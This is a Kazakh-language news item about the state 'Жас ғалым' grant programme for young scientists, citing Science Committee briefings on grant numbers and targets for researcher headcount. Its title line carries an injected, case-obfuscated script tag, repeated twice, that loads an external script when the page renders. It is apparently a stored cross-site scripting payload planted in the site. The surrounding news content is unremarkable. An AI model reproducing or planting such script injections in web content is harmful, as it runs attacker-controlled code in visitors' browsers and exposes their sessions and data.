«Жас ғалым» проект<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
13.04.2022
«Жас ғалым» жобасы аясында 1000 грант бөлінеді. Былтыр мемлекет басшысы «Жас ғалым» жобасы бойынша 1 мың грант бөлуді тапсырды. Мақсаты - ғалымдар санын арттыру. Жоба, грант докторантура бітірген, докторлықты қорғаған ғалымдарға арналған. Бұл туралы Орталық коммуникациялар қызметінде өткен брифингте ҚР БҒМ Ғылым комитетінің төрайымы Жанна Құрманғалиева хабарлады. Конкурс 2 мәрте өткізілді. https://ortcom.kz/kk/novosti/1649750945
Заңға енгізілген өзгерістердің нәтижесінде ғалымдарға ай сайын жалақы төленеді - Ж. Құрманғалиева. 2025 жылы Қазақстанда ғалымдар санын 1,5 есеге арттырып, кемінде 34-35 мыңға жеткізу көзделген. Оның кемінде жартысы, яғни 17 мыңы жас ғалымдар болуы тиіс. Бұл туралы Орталық коммуникациялар қызметінде өткен брифингте ҚР БҒМ Ғылым комитетінің төрайымы Құрманғалиева Жанна Құрманғалиева мәлім етті.https://ortcom.kz/kk/novosti/1649748227
Елімізде жас ғалымдар саны 1 мың адамға өсті – Ғылым комитетінің төрайымы. Мемлекет басшысының қолдауымен, халыққа Жолдауында алға қойылған міндеттерін орындау нәтижесінде ғылым саласында соңғы жылдары түбегейлі өзгерістер болып жатыр. Бірінші кезекте қаржыландыру көлемі екі есеге жуық артты. Отандық вакцина әзірленіп, 50-ден аса ірі бағдарламалық ғылыми жобалар іске асырылуда. Олардың нәтижесі халықтың әл-ауқатына оң әсерін тигізеді деп сенеміз. Бұл туралы Орталық коммуникациялар қызметінде өткен брифингте ҚР БҒМ Ғылым комитетінің төрайымы Құрманғалиева Жанна Дулатқызы мәлім етті.
https://ortcom.kz/kk/novosti/1649742935

